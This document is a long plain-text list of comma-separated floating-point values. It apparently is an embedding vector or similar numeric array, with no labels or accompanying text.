-0.01207288634032011, 0.01062923576682806, 0.01082738395780325, 0.008626523427665234, -0.014535585418343544, -0.049253981560468674, 0.020352650433778763, -0.012808865867555141, -0.055339962244033813, 0.014018985442817211, -0.00899451319128275, 0.06261482834815979, 0.014507278800010681, -0.00575337465852499, -0.02418823353946209, -0.013155625201761723, -0.0074022505432367325, 0.008187766186892986, -0.011053838767111301, -0.0057109142653644085, -0.012157807126641273, 0.02952408231794834, -0.004925398156046867, 0.009390809573233128, 0.01719643361866474, -0.020550798624753952, 0.013290083035826683, -0.014988495968282223, -0.010544314980506897, -0.010728309862315655, -0.034307945519685745, -0.007713626138865948, 0.014790347777307034, -0.02372116968035698, 0.035015616565942764, 0.022249212488532066, -0.012030426412820816, 0.03880874067544937, 0.037082020193338394, -0.01950344443321228, 0.025348816066980362, 0.010933534242212772, -0.024202387779951096, -0.0012897325213998556, -0.010940611362457275, -0.03303413465619087, 0.010487700812518597, 0.029778843745589256, -0.010593852028250694, 0.01912130042910576, -0.02645278535783291, 0.013530691154301167, 0.013806683011353016, 0.009574804455041885, 0.01912130042910576, -0.0017329121474176645, 0.017054898664355278, 0.02590079978108406, -0.03235476836562157, 0.003637434681877494, -0.004182342439889908, -0.02090463414788246, 0.0011977350804954767, 0.012164884246885777, 0.013799606822431087, 0.00538184680044651, -0.01614907756447792, 0.015554633922874928, 0.009291735477745533, -0.03184524551033974, -0.03362857922911644, 0.009511113166809082, -0.03210000693798065, -0.012348879128694534, 0.02316918596625328, -0.01563955470919609, -0.027556752786040306, -0.0028678413946181536, -0.005049240775406361, 0.02909947745501995, -0.002016865648329258, -0.003561360063031316, 0.005424306727945805, 0.0072147175669670105, 0.016432147473096848, -0.03218492865562439, -0.020777253434062004, 0.008470835164189339, -0.007487171329557896, -0.020734794437885284, -0.04413043335080147, -0.013077781535685062, -0.016644448041915894, -0.0024821599945425987, 0.02294273115694523, -0.013162701390683651, -0.034817468374967575, -0.0002534350787755102, 0.010685849003493786, -0.0023193955421447754, -0.002809458412230015, 0.01258241105824709, -0.028292732313275337, 0.004235417582094669, 0.0025741574354469776, -0.013028244487941265, 0.044611651450395584, 0.014365744777023792, 0.010721232742071152, 0.034506093710660934, 0.04169604182243347, 0.03249630331993103, 0.0056472234427928925, -0.023707017302513123, -0.00987202674150467, -0.008308070711791515, 0.00786223728209734, 0.018739158287644386, -0.009044050239026546, -0.0012446183245629072, 0.0018417167011648417, 0.008654830045998096, 0.0007076721522025764, -0.011025532148778439, -0.0034392864909023046, -0.017408734187483788, -0.006241668481379747, 0.0031809862703084946, -0.003023529192432761, -0.013318389654159546, -0.025263896211981773, 0.033260591328144073, 0.034930698573589325, -0.01382791344076395, 0.014776194468140602, 0.008725597523152828, -0.016531221568584442, -0.0072147175669670105, -0.011287370696663857, -0.0015834163641557097, 0.038837045431137085, -0.0319867804646492, 0.013318389654159546, -0.02980715036392212, 0.03858228400349617, -0.009801259264349937, 0.007572092115879059, -0.01490357518196106, -0.0033295974135398865, -0.01876746490597725, 0.004599868785589933, 0.002347702393308282, -0.008810518309473991, 0.0033260590862482786, 0.006510583683848381, -0.027089688926935196, 0.0017010668525472283, -0.018894845619797707, 0.0014224209589883685, 0.009164353832602501, -0.00542076863348484, 0.007734856568276882, 0.01002771407365799, 0.01396237127482891, -0.002181399380788207, -0.015894316136837006, 0.027726594358682632, -0.03093942627310753, -0.017253046855330467, -0.00572506757453084, 0.01954590529203415, -0.017493655905127525, -0.0016356072155758739, -0.0016992976889014244, -0.02219259738922119, 0.012334725819528103, -0.0252072811126709, 0.004638791084289551, -0.019630825147032738, -0.01186058484017849, -0.003212831448763609, -0.018555164337158203, -0.018852386623620987, -0.00832930114120245, -0.01145013514906168, 0.0037648158613592386, 0.00143126689363271, 0.012823019176721573, 0.015271564945578575, 0.09052541851997375, -0.00197971286252141, -0.00282891932874918, -0.005169544834643602, -0.0034392864909023046, -0.008973282761871815, 0.014889421872794628, 0.014889421872794628, 0.032128315418958664, -0.021032016724348068, 0.024428842589259148, 0.01716812700033188, -0.019885586574673653, 0.005894909147173166, 0.015894316136837006, 0.03793122619390488, -0.016375532373785973, -0.0017276046564802527, 0.030373288318514824, 0.00030098180286586285, 0.01883823238313198, 0.00197971286252141, -0.0021884760353714228, -0.004794478882104158, 0.01958836428821087, -0.00832930114120245, -0.0008744173683226109, -0.04135635867714882, -0.038723818957805634, -0.004674174357205629, 0.01537063904106617, 0.0013472308637574315, -0.005863063503056765, -0.019361909478902817, -0.010133865289390087, 0.02012619562447071, 0.02156984619796276, 0.025801725685596466, -0.013254699297249317, -0.026934001594781876, -0.018116407096385956, -0.030599743127822876, -0.03934657201170921, -0.00009863180457614362, -0.022150138393044472, 0.011733204126358032, 0.02418823353946209, 0.005396000109612942, -0.02601402811706066, -0.011811047792434692, -0.0072890231385827065, -0.0351005382835865, 0.015059263445436954, -0.00011234295379836112, -0.00538184680044651, 0.009971100836992264, -0.03300582990050316, -0.015809396281838417, 0.0032623684965074062, -0.0009854334639385343, 0.010678772814571857, 0.029354240745306015, -0.02391931787133217, -0.007600398734211922, -0.006913956720381975, -0.004585715476423502, -0.030797891318798065, -0.004129266832023859, -0.01763518899679184, 0.02519312873482704, 0.013806683011353016, -0.0025989259593188763, 0.00708025973290205, 0.0020964788272976875, -0.004737865179777145, -0.013467000797390938, -0.0038638899568468332, 0.015823548659682274, -0.021994449198246002, -0.01672936975955963, 0.011973812244832516, 0.00928465835750103, -0.0021867069881409407, 0.009511113166809082, -0.004327415022999048, 0.025094054639339447, -0.029552388936281204, -0.006209822837263346, 0.0013286544708535075, -0.005809988360852003, -0.010367397218942642, 0.01260364055633545, 0.002678539138287306, 0.0015639554476365447, 0.00041642083670012653, 0.012639024294912815, 0.0037860460579395294, -0.025872493162751198, -0.02423069439828396, -0.041724350303411484, 0.005930292420089245, 0.018795771524310112, -0.0033065981697291136, -0.010381550528109074, -0.01930529624223709, 0.004992627073079348, -0.007826853543519974, 0.001232234062626958, -0.007179333828389645, -0.010254168882966042, 0.00018465820176061243, -0.0028890715911984444, 0.012681485153734684, -0.013438694179058075, -0.01801733300089836, 0.03229815512895584, -0.005123546347022057, -0.011520902626216412, -0.01341746374964714, -0.023381488397717476, -0.02625463716685772, 0.012688561342656612, -0.00005188674185774289, -0.037195246666669846, 0.01131567731499672, 0.02161230705678463, 0.019998814910650253, -0.023607943207025528, 0.022914424538612366, 0.013707608915865421, 0.008300994522869587, 0.018625929951667786, 0.0165453739464283, -0.013056551106274128, 0.0007430557743646204, -0.017267201095819473, 0.02485344558954239, 0.002222090493887663, -0.007904698140919209, 0.004366337321698666, -0.00961726438254118, 0.04758387431502342, -0.01974405348300934, 0.007734856568276882, 0.007841006852686405, 0.0026006950065493584, -0.0003803737636189908, 0.006160285789519548, 0.006829035934060812, -0.0014533816138282418, 0.02141415886580944, -0.034081488847732544, 0.0014754964504390955, 0.014578046277165413, 0.026650933548808098, -0.025037439540028572, 0.030712971463799477, 0.010813230648636818, -0.001356961322017014, 0.012568256817758083, -0.020536646246910095, 0.010678772814571857, 0.004617560654878616, -0.018555164337158203, -0.001116352854296565, 0.010020637884736061, -0.010133865289390087, -0.008187766186892986, -0.026183869689702988, 0.0036232813727110624, 0.022220905870199203, 0.008697290904819965, 0.008017925545573235, -0.016998285427689552, 0.007473018020391464, 0.015597093850374222, -0.009235121309757233, 0.01347407791763544, 0.03518546000123024, -0.008428375236690044, 0.004790940321981907, -0.0030730662401765585, 0.021980296820402145, 0.001046470133587718, -0.015625400468707085, 0.002422007964923978, 0.008477912284433842, 0.013113164342939854, -0.04673466831445694, 0.014719580300152302, 0.007855161093175411, 0.017649343237280846, -0.005537534598261118, -0.006273513659834862, 0.01646045409142971, -0.016474606469273567, -0.0049643199890851974, -0.02485344558954239, 0.006209822837263346, 0.009029896929860115, -0.010402780026197433, -0.030090220272541046, -0.01537063904106617, 0.008421298116445541, 0.004660021048039198, -0.04381905868649483, -0.008633600547909737, 0.028420113027095795, -0.006301820278167725, 0.002972223097458482, 0.0069458018988370895, -0.007274869363754988, -0.0004803324700333178, -0.006365511100739241, 0.03940318524837494, 0.0001769180380506441, -0.01981481909751892, -0.017564423382282257, -0.015214950777590275, 0.007869314402341843, -0.007621629163622856, -0.010777846910059452, 0.003085450502112508, -0.009107740595936775, -0.0030872197821736336, -0.00439818250015378, 0.029552388936281204, -0.016205692663788795, 0.028037970885634422, -0.007749009877443314, -0.03824260085821152, -0.0010738924611359835, -0.014231286942958832, 0.001230464898981154, 0.0005466767470352352, -0.0330907478928566, -0.0023423947859555483, 0.009270505048334599, -0.007508401293307543, -0.003228754037991166, 0.010034791193902493, 0.0005104085430502892, -0.03139233589172363, -0.00915020052343607, -0.015299871563911438, -0.00030230870470404625, 0.002512236125767231, 0.02929762564599514, -0.016828443855047226, 0.012009195983409882, -0.015625400468707085, 0.013969448395073414, 0.0045255632139742374, -0.02297103777527809, -0.00934127252548933, -0.0029987606685608625, -0.006492891814559698, -0.01876746490597725, -0.015965083613991737, -0.003462285967543721, 0.06386033445596695, -0.02418823353946209, 0.010891074314713478, 0.022829502820968628, 0.0019195607164874673, 0.017734263092279434, 0.0006006367038935423, 0.026282943785190582, 0.00840714480727911, 0.011825201101601124, 0.00029633770463988185, -0.005031548906117678, 0.009079433977603912, -0.0029439160134643316, -0.010247092694044113, -0.0020752486307173967, -0.004546793643385172, -0.025815879926085472, -0.0075225550681352615, 0.0057675279676914215, -0.017578575760126114, 0.011464288458228111, 0.036459267139434814, -0.016163231804966927, -0.007621629163622856, -0.005399538204073906, -0.012455029413104057, 0.0020947095472365618, 0.0008761865901760757, -0.02239074558019638, 0.009638494811952114, -0.017054898664355278, 0.006630887743085623, -0.02601402811706066, 0.00201332732103765, 0.015667861327528954, -0.003874504938721657, 0.027132149785757065, 0.006174439564347267, -0.007628705818206072, 0.001063277362845838, 0.013665148988366127, -0.0004847554082516581, -0.014747886918485165, 0.011407675221562386, -0.012893786653876305, -0.015851855278015137, -0.007911774329841137, 0.028703181073069572, 0.01388452760875225, -0.018937306478619576, 0.003134987549856305, -0.0288730226457119, 0.016955824568867683, 0.01090522762387991, -0.01224980503320694, -0.030316675081849098, -0.0031456027645617723, -0.036459267139434814, 0.0037152788136154413, -0.000861590844579041, -0.023551328107714653, -0.0104947779327631, -0.014443588443100452, -0.008562833070755005, 0.0013949987478554249, -0.02223505824804306, -0.006478738505393267, -0.012228574603796005, -0.01883823238313198, 0.0004170842585153878, -0.0027386911679059267, 0.03767646476626396, -0.0033119055442512035, -0.006542428862303495, 0.004897091072052717, 0.02785397507250309, -0.010728309862315655, 0.004989088512957096, 0.015101723372936249, -0.027401065453886986, 0.039035193622112274, 0.0038921968080103397, -0.00223270570859313, 0.006967032328248024, 0.0023883935064077377, 0.01292917039245367, 0.001043816446326673, -0.007331483531743288, -0.028858870267868042, -0.038837045431137085, 0.0034392864909023046, -0.0005740990163758397, -0.013650995679199696, 0.005399538204073906, 0.006153209134936333, -0.008718520402908325, 0.018625929951667786, 0.02403254620730877, -0.01970159262418747, -0.015696167945861816, -0.018243787810206413, -0.012702714651823044, 0.01759273000061512, 0.01681428961455822, -0.04030900448560715, -0.014733733609318733, 0.0023370871786028147, 0.02212183177471161, 0.008124075829982758, 0.006422124803066254, -0.008860055357217789, 0.03586482256650925, -0.006712270434945822, -0.005569379776716232, -0.010544314980506897, 0.029637308791279793, -0.019008073955774307, -0.01139352098107338, 0.03507222980260849, -0.010183402337133884, 0.005965676158666611, 0.007373943459242582, -0.007112104911357164, 0.014096829108893871, -0.004652944393455982, -0.012108270078897476, -0.029014557600021362, -0.016248151659965515, -0.003987732343375683, -0.002572388155385852, 0.01794656552374363, 0.04240371286869049, 0.005102315917611122, 0.008343454450368881, 0.005169544834643602, -0.0028006124775856733, 0.02316918596625328, -0.037506625056266785, 0.004005424212664366, -0.0016665678704157472, -0.01848439686000347, -0.02079140767455101, 0.020932942628860474, 0.01848439686000347, 0.0024485455360263586, -0.015894316136837006, -0.006089518778026104, 0.026382017880678177, -0.011308601126074791, 0.005802911706268787, 0.008039155043661594, 0.006623811088502407, -0.019843127578496933, -0.01896561309695244, -0.006818421185016632, -0.00701303081586957, 0.03866720572113991, 0.018541010096669197, -0.005728606134653091, 0.007274869363754988, -0.018908999860286713, -0.007324406411498785, -0.01914960891008377, -0.030486516654491425, -0.018824078142642975, -0.0032146007288247347, -0.0032623684965074062, -0.023353179916739464, 0.0006581351044587791, -0.025999873876571655, 0.005530457943677902, -0.01082738395780325, 0.0030748355202376842, 0.02590079978108406, 0.02519312873482704, -0.013544844463467598, -0.008520372211933136, -0.026509398594498634, 0.016800137236714363, 0.012943323701620102, -0.007465940900146961, 0.011478441767394543, -0.015866009518504143, 0.010742463171482086, -0.000934127252548933, -0.01946098357439041, -0.007373943459242582, -0.019376063719391823, 0.005795834586024284, 0.01258241105824709, 0.00015170720871537924, 0.014457741752266884, 0.012759328819811344, -0.0045715621672570705, 0.005615378264337778, -0.006499968469142914, 0.00003214932439732365, -0.008017925545573235, -0.0030429901089519262, 0.009935717098414898, -0.01010555773973465, 0.004755556583404541, -0.008753904141485691, 0.00538184680044651, 0.007734856568276882, 0.004893552977591753, -0.005993983242660761, -0.018470242619514465, 0.0019850202370435, 0.013587305322289467, -0.006517660338431597, 0.010133865289390087, -0.017536114901304245, 0.019687438383698463, 0.007154565304517746, -0.020550798624753952, -0.024273155257105827, 0.011676589958369732, 0.011046761646866798, 0.0067193470895290375, 0.027556752786040306, -0.007154565304517746, -0.0038603516295552254, -0.0023211645893752575, 0.010155094787478447, -0.023933472111821175, -0.010544314980506897, 0.014344514347612858, -0.02083386853337288, 0.0016037620371207595, -0.01429497729986906, 0.0035985128488391638, 0.01170489750802517, 0.008867131546139717, 0.009504036977887154, 0.010685849003493786, 0.027669981122016907, 0.01240549236536026, -0.007763163186609745, -0.000012411906027409714, -0.003920503426343203, -0.011803971603512764, 0.005162468180060387, -0.010586774908006191, -0.007593322079628706, -0.01946098357439041, -0.005668453872203827, 0.015214950777590275, -0.008506218902766705, 0.006538890767842531, -0.0104947779327631, -0.012999936938285828, -0.011365214362740517, -0.0159933902323246, 0.011542132124304771, 0.005059855990111828, -0.010806153528392315, -0.018116407096385956, 0.00565783865749836, -0.0031473718117922544, -0.008987436071038246, 0.014804501086473465, -0.020819714292883873, 0.0028165350668132305, 0.015625400468707085, 0.018852386623620987, -0.005038625560700893, 0.004175265785306692, -0.02714630402624607, 0.007876390591263771, 0.002016865648329258, -0.0002885975409299135, 0.0024733140598982573, 0.009001589380204678, -0.002315856982022524, 0.017932411283254623, -0.004157573916018009, 0.0019195607164874673, -0.01590847037732601, -0.0024485455360263586, -0.007338560186326504, -0.02176799438893795, 0.012702714651823044, 0.005123546347022057, 0.0032057547941803932, 0.0123842628672719, -0.011931352317333221, 0.0026077718939632177, 0.007989617995917797, 0.012752251699566841, -0.010749539360404015, -0.00609659543260932, 0.0012516950955614448, 0.006061211694031954, -0.009079433977603912, -0.020692333579063416, 0.010070174932479858, 0.008187766186892986, -0.0015011494979262352, 0.008916668593883514, 0.00014960631961002946, 0.017408734187483788, 0.02391931787133217, 0.01281594205647707, 0.01070707943290472, 0.006814882624894381, -0.012157807126641273, -0.004115113522857428, -0.02574511244893074, 0.020267730578780174, 0.004822785500437021, -0.003405672265216708, 0.014422358013689518, -0.0005227928049862385, 0.008237303234636784, 0.014677120372653008, -0.019404370337724686, 0.005700299050658941, -0.001101314788684249, 0.015752781182527542, 0.00487586110830307, -0.012292264960706234, -0.017621036618947983, -0.011683667078614235, -0.009624341502785683, 0.002057556761428714, -0.02012619562447071, -0.005583533085882664, -0.0018364092102274299, 0.005123546347022057, -0.008159459568560123, -0.016715215519070625, 0.035553447902202606, -0.009454499930143356, -0.0021548615768551826, -0.025348816066980362, -0.009001589380204678, -0.012150730937719345, 0.008315147832036018, 0.018668390810489655, 0.018824078142642975, 0.006687501911073923, -0.009737568907439709, -0.007543785031884909, -0.0005758681800216436, 0.009121893905103207, -0.0038037376943975687, 0.011167066171765327, -0.004129266832023859, -0.00223801308311522, 0.009376656264066696, -0.006797190755605698, -0.0007532285526394844, -0.0049466281197965145, -0.020564952865242958, -0.011223680339753628, 0.010671695694327354, -0.01943267695605755, -0.028887176886200905, 0.001942560076713562, -0.017621036618947983, 0.00949695985764265, -0.015441406518220901, -0.005587071646004915, -0.016743522137403488, -0.007770240306854248, -0.0013313081581145525, -0.001120775705203414, 0.01810225285589695, 0.00011311697016935796, 0.006542428862303495, -0.0017939488170668483, 0.0006254052277654409, -0.0070201074704527855, 0.016941670328378677, -0.002404316095635295, 0.007805623579770327, -0.021159397438168526, -0.027556752786040306, -0.008081615902483463, -0.023650402203202248, -0.030061911791563034, -0.013891603797674179, -0.02278704196214676, 0.017309660091996193, 0.010947687551379204, -0.012900862842798233, 0.013367926701903343, 0.04724419116973877, -0.02219259738922119, 0.021428313106298447, -0.009305888786911964, 0.014861115254461765, -0.0004038154147565365, -0.012214421294629574, -0.0032252157106995583, 0.005990444682538509, 0.008803441189229488, 0.01259656436741352, 0.0032039855141192675, 0.01437282096594572, -0.004224802833050489, -0.0004913898301310837, -0.011535055935382843, -0.006461046636104584, -0.009270505048334599, 0.007087336387485266, 0.00013467884855344892, 0.01579524204134941, 0.003573744324967265, -0.010806153528392315, -0.0025741574354469776, -0.01626230590045452, 0.0004155362257733941, -0.021867068484425545, 0.00013512115401681513, -0.0036091278307139874, -0.003244676860049367, 0.013934064656496048, -0.009680954739451408, 0.018272094428539276, -0.006284128408879042, 0.002255704952403903, -0.009666801430284977, -0.0031296799425035715, -0.00920681469142437, 0.00001794059426174499, -0.002821842674165964, -0.011244909837841988, 0.0024485455360263586, 0.015540480613708496, 0.03892196714878082, -0.0005661377217620611, 0.0014409973518922925, -0.039459798485040665, -0.012186114676296711, 0.016842596232891083, -0.014146366156637669, 0.01861177757382393, 0.02649524435400963, -0.019673286005854607, -0.0020380958449095488, -0.023239953443408012, -0.00201332732103765, -0.007338560186326504, 0.012702714651823044, 0.018512703478336334, 0.022107677534222603, 0.008456681855022907, 0.01783333718776703, -0.00406557647511363, 0.006142594385892153, 0.018668390810489655, -0.0104381637647748, 0.030882813036441803, 0.017974872142076492, 0.004341568797826767, 0.033260591328144073, 0.012865479104220867, -0.02445714920759201, 0.015158337540924549, -0.0065070451237261295, -0.031533870846033096, 0.01490357518196106, 0.01712566614151001, 0.015441406518220901, -0.011301524005830288, -0.02714630402624607, -0.006949340458959341, 0.02141415886580944, 0.005870140623301268, 0.03495900332927704, -0.007055491209030151, -0.00002053907883237116, -0.009468653239309788, 0.023692863062024117, -0.014118059538304806, -0.018314555287361145, -0.00820899661630392, 0.028660722076892853, -0.004430027678608894, -0.0069068800657987595, 0.0027209992986172438, -0.019602518528699875, -0.0012251574080437422, -0.0036940486170351505, -0.006485815159976482, -0.020352650433778763, 0.01010555773973465, -0.010034791193902493, 0.008216073736548424, -0.011605823412537575, -0.01716812700033188, 0.01856931671500206, -0.014287900179624557, -0.02605648897588253, 0.0003211062285117805, 0.0008664560737088323, -0.008895439095795155, 0.02449961006641388, 0.01341746374964714, -0.00879636500030756, 0.029467467218637466, 0.006365511100739241, 0.024513762444257736, 0.007274869363754988, 0.014875268563628197, -0.029354240745306015, 0.010657542385160923, -0.006917495280504227, 0.010367397218942642, 0.02040926367044449, 0.005997521337121725, 0.01220734417438507, -0.0003805949236266315, -0.012278111651539803, -0.015752781182527542, 0.006577812600880861, -0.02172553539276123, 0.02434392087161541, 0.0020292499102652073, -0.016587834805250168, -0.006287666969001293, 0.04118651896715164, 0.00002439533818687778, -0.009164353832602501, -0.014273746870458126, 0.0075225550681352615, -0.009645571000874043, 0.008534526452422142, -0.012957477010786533, 0.008124075829982758, 0.0042460327968001366, -0.010862767696380615, -0.009596033953130245, 0.009298811666667461, 0.003973579034209251, 0.009157277643680573, -0.01240549236536026, -0.01076369360089302, -0.04067699611186981, -0.033373817801475525, -0.007066106423735619, 0.015568787232041359, 0.022206751629710197, 0.015597093850374222, 0.007848083972930908, -0.01739458180963993, -0.005661377217620611, -0.006952878553420305, 0.009440346620976925, -0.012922093272209167, 0.007749009877443314, 0.006783037446439266, 0.0020805560052394867, -0.005502150859683752, 0.004684789571911097, 0.030571436509490013, 0.00893082283437252, 0.003888658480718732, -0.021980296820402145, -0.006082442123442888, 0.00483693927526474, 0.00704133789986372, -0.02297103777527809, -0.008067462593317032, -0.0159933902323246, 0.016531221568584442, -0.0141039052978158, -0.003517130622640252, -0.003722355468198657, 0.002333548851311207, -0.011535055935382843, -0.015073416754603386, -0.020777253434062004, -0.014018985442817211, -0.010119711980223656, -0.003099604044109583, -0.003462285967543721, -0.017932411283254623, -0.01152797881513834, -0.0006055019912309945, -0.003011144930496812, -0.016559528186917305, -0.0319867804646492, -0.002552927238866687, 0.0028926099184900522, -0.005668453872203827, -0.015483866445720196, 0.015540480613708496, -0.017408734187483788, -0.005265080835670233, 0.0012030426878482103, 0.014875268563628197, -0.01341746374964714, 0.02523558773100376, -0.005463229026645422, -0.03303413465619087, -0.0019142531091347337, 0.006008136551827192, 0.014861115254461765, 0.014832807704806328, -0.015809396281838417, 0.004122190177440643, 0.008138229139149189, 0.006078903563320637, 0.0002914724755100906, -0.018739158287644386, -0.0007023646030575037, 0.021470772102475166, -0.008124075829982758, -0.019913893193006516, 0.0189939197152853, 0.006287666969001293, 0.026084795594215393, -0.010020637884736061, -0.01336084958165884, -0.03447778522968292, -0.011485518887639046, 0.028858870267868042, 0.004008962772786617, -0.023707017302513123, -0.000916435441467911, 0.01076369360089302, -0.007508401293307543, 0.012030426412820816, -0.009631417691707611, -0.0040761916898190975, -0.01701243780553341, -0.006804267410188913, -0.0012614255538210273, -0.009461576119065285, 0.019291142001748085, 0.04911244660615921, -0.012256881222128868, 0.023622095584869385, -0.006694578565657139, 0.0008797249174676836, 0.00017614402167964727, -0.016842596232891083, 0.01623399928212166, 0.020310189574956894, 0.014195903204381466, -0.002439699601382017, 0.0057109142653644085, -0.0063761258497834206, -0.016686908900737762, 0.0015984544297680259, -0.011591669172048569, 0.012547027319669724, 0.01076369360089302, 0.002606002613902092, 0.010289552621543407, 0.007989617995917797, -0.010742463171482086, -0.027287837117910385, -0.01266025472432375, -0.003832044545561075, 0.008959129452705383, 0.013665148988366127, 0.005714452359825373, 0.006885650102049112, -0.013955294154584408, 0.006323050707578659, -0.01774841733276844, 0.02567434497177601, 0.0024573914706707, -0.01328300591558218, 0.00041951690218411386, 0.017974872142076492, 0.003913426771759987, 0.021329239010810852, 0.020805560052394867, -0.048546310514211655, 0.016800137236714363, -0.005912600550800562, -0.026976462453603745, 0.00474140327423811, -0.017295507714152336, 0.0017833338351920247, 0.0047201733104884624, -0.010112634859979153, -0.015653707087039948, -0.010876921005547047, -0.029552388936281204, -0.00887420866638422, -0.016757676377892494, 0.018045639619231224, 0.02707553654909134, -0.017069052904844284, 0.002084094565361738, -0.015851855278015137, -0.00579229649156332, -0.025023287162184715, 0.006361972540616989, -0.02227751910686493, 0.025292202830314636, 0.01970159262418747, -0.00956065021455288, -0.014521432109177113, 0.01708320528268814, -0.004900629632174969, 0.014889421872794628, 0.025292202830314636, 0.019135454669594765, -0.043705832213163376, -0.00819484330713749, 0.0038037376943975687, 0.011775664053857327, 0.02118770405650139, -0.007961311377584934, 0.008803441189229488, -0.011874738149344921, -0.002496313536539674, 0.025249741971492767, -0.0004732557572424412, -0.015625400468707085, -0.013622689060866833, -0.0007572091999463737, -0.017649343237280846, -0.005268618930131197, 0.013658071868121624, -0.0013339619617909193, -0.010409857146441936, 0.003318982431665063, 0.008046232163906097, -0.0008947629830799997, 0.014379898086190224, -0.01158459298312664, -0.021230164915323257, 0.0005170429358258843, 0.013544844463467598, -0.004405259154736996, 0.010742463171482086, -0.004568023607134819, 0.029071170836687088, -0.002057556761428714, -0.008760981261730194, -0.02227751910686493, 0.013247622177004814, -0.021400004625320435, 0.010324936360120773, 0.019092993810772896, 0.002057556761428714, -0.015427252277731895, 0.010756616480648518, -0.0013666917802765965, 0.004999703727662563, -0.004345106892287731, 0.022419054061174393, 0.00813115295022726, -0.015441406518220901, -0.007366866804659367, 0.004631713964045048, -0.008470835164189339, -0.006804267410188913, 0.012731022201478481, 0.0038957351353019476, 0.002858995459973812, -0.022065216675400734, 0.02149907872080803, 0.0077277799136936665, -0.017521962523460388, -0.013261775486171246, -0.018116407096385956, -0.009461576119065285, -0.03631773591041565, 0.013162701390683651, 0.009355425834655762, 0.018470242619514465, 0.003524207277223468, -0.009383732452988625, 0.027953049167990685, 0.016333073377609253, 0.006839651148766279, -0.0037506623193621635, -0.0017019514925777912, 0.0010535469045862556, 0.0016179154627025127, 0.005396000109612942, -0.016984131187200546, -0.039035193622112274, 0.02921270579099655, -0.0007810931419953704, 0.0027033076621592045, -0.019729899242520332, -0.005098777823150158, 0.014790347777307034, -0.005112931132316589, -0.006400894373655319, -0.009787105955183506, -0.03260953351855278, -0.02156984619796276, 0.00034587475238367915, 0.01981481909751892, -0.0003491919778753072, 0.005986906122416258, 0.025617731735110283, 0.002514005172997713, -0.019913893193006516, -0.021230164915323257, 0.0009385501616634429, 0.0016187999863177538, 0.007593322079628706, -0.01145013514906168, -0.0004518044297583401, 0.0016364918556064367, 0.0051589300855994225, 0.023296566680073738, 0.005201390013098717, 0.00484755402430892, -0.030911119654774666, -0.007692396175116301, -0.015059263445436954, -0.009355425834655762, -0.019984660670161247, -0.0153281781822443, 0.005675530526787043, -0.005519842728972435, -0.00714748864993453, -0.0012605410302057862, 0.018357016146183014, 0.02063572034239769, 0.0141605194658041, 0.0009739337838254869, -0.009794182144105434, 0.018342861905694008, 0.015059263445436954, 0.008180689997971058, -0.012476259842514992, 0.00220439862459898, -0.017366275191307068, 0.00766408909112215, 0.006613196339458227, -0.00941911619156599, 0.021131090819835663, -0.010339089669287205, 0.009985254146158695, -0.018385322764515877, -0.012780559249222279, -0.0011039685923606157, -0.00393111864104867, 0.03235476836562157, -0.005374769680202007, 0.014323283918201923, -0.010169249027967453, 0.004996165167540312, -0.009051126427948475, -0.005243850406259298, -0.020154502242803574, 0.004210649058222771, -0.018470242619514465, 0.006064750254154205, -0.023707017302513123, -0.010615082457661629, 0.011011378839612007, -0.022999344393610954, -0.014386974275112152, -0.02750013954937458, -0.007699472829699516, -0.01974405348300934, 0.019942201673984528, 0.011945505626499653, 0.008902515284717083, -0.024598684161901474, 0.009525267407298088, 0.01220734417438507, 0.012709791772067547, -0.013247622177004814, 0.006195669528096914, -0.026042334735393524, -0.005335847847163677, 0.004203572403639555, 0.006266437005251646, -0.015384792350232601, -0.0004679482080973685, -0.013863297179341316, 0.011577515862882137, 0.013686379417777061, 0.004996165167540312, 0.002092940267175436, 0.0008739751065149903, -0.01912130042910576, -0.03444948047399521, 0.015540480613708496, -0.0037152788136154413, -0.009525267407298088, 0.016998285427689552, 0.011874738149344921, -0.032043393701314926, 0.01353776827454567, -0.007543785031884909, 0.0005112931248731911, 0.0026113102212548256, 0.0034003646578639746, 0.006315974052995443, 0.03580820932984352, 0.02121601067483425, 0.0066627333872020245, 0.013912834227085114, 0.004532639868557453, -0.0027581520844250917, 0.009504036977887154, 0.0043769520707428455, -0.012568256817758083, -0.0017506039002910256, 0.010140941478312016, -0.02079140767455101, -0.000017553586076246575, 0.0052155437879264355, -0.017776723951101303, 0.008237303234636784, 0.020579105243086815, 0.005300464108586311, -0.0029049941804260015, -0.00187002366874367, -0.002752844709903002, 0.012709791772067547, 0.023508869111537933, -0.01907884143292904, -0.011343983933329582, -0.006386741064488888, -0.003260599449276924, -0.009801259264349937, -0.01950344443321228, 0.0007532285526394844, 0.022758735343813896, 0.03184524551033974, 0.002680308185517788, -0.004334491677582264, -0.018555164337158203, -0.009065279737114906, 0.0070519526489079, 0.002784689888358116, -0.03181694075465202, -0.009355425834655762, -0.0031969088595360518, 0.027570907026529312, 0.009808335453271866, -0.006358433980494738, 0.0015091107925400138, 0.009178508073091507, -0.008909592404961586, -0.025150667876005173, 0.007975464686751366, -0.0012384261935949326, 0.01572447456419468, 0.008357607759535313, -0.002147784922271967, -0.007685319520533085, 0.02281535044312477, 0.016219845041632652, -0.0008580524590797722, -0.02325410582125187, 0.011011378839612007, 0.00969510804861784, 0.0202111154794693, 0.009808335453271866, -0.00009393241634825245, -0.0063761258497834206, -0.026240482926368713, -0.01563955470919609, -0.017805030569434166, -0.011796894483268261, -0.007692396175116301, -0.00174352724570781, -0.0019177915528416634, -0.004596330691128969, 0.04047884792089462, 0.00016309630882460624, -0.015229104086756706, 0.0024662374053150415, 0.004182342439889908, 0.006153209134936333, -0.009058203548192978, 0.008392991498112679, 0.011414751410484314, 0.011075069196522236, 0.006691040005534887, -0.0036834334023296833, 0.0014631121885031462, 0.008803441189229488, 0.006078903563320637, 0.0104947779327631, 0.015866009518504143, -0.015979235991835594, 0.00626997509971261, 0.016743522137403488, 0.010834460146725178, 0.0007045760867185891, -0.014719580300152302, -0.008039155043661594, -0.0032535225618630648, -0.0013834990095347166, -0.004684789571911097, -0.012709791772067547, -0.011888892389833927, -0.013353773392736912, 0.0045821769163012505, -0.005548149347305298, -0.0012048118514940143, 0.0005630416562780738, -0.017521962523460388, -0.015512173064053059, 0.0009270504815503955, 0.004713096655905247, 0.0041328053921461105, 0.0070944130420684814, -0.012256881222128868, 0.00565783865749836, 0.008867131546139717, 0.028349345549941063, -0.01484696101397276, 0.024216540157794952, 0.013721763156354427, -0.010544314980506897, -0.008442528545856476, -0.008506218902766705, -0.02016865648329258, -0.00267676985822618, -0.014167596586048603, -0.02423069439828396, -0.014776194468140602, -0.0026272328104823828, -0.006659194827079773, 0.00333490502089262, 